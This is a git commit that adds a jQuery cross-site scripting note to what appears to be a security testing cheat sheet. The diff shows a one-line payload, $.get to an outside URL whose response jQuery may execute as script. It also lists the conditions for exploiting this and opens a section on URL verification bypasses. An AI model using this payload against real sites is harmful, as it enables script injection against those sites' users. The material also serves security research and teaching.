Add jQuery XSS notice.

This commit is contained in:
EdOverflow 2017-07-14 13:37:21 +01:00
parent d8931cea8b
commit ba67fdae97

View file

@ -40,6 +40,11 @@ Note: This kind of depends on what security level the application is set to. See
$.get('http://sakurity.com/jqueryxss')
```
In order to really exploit this jQuery XSS you will need to fulfil one of the following requirements:
1) Find any cross domain requests to untrusted domains which may inadvertently execute script.
2) Find any requests to trusted API endpoints where script can be injected into data sources.
**URL verification bypasses (works without `	` too)**
```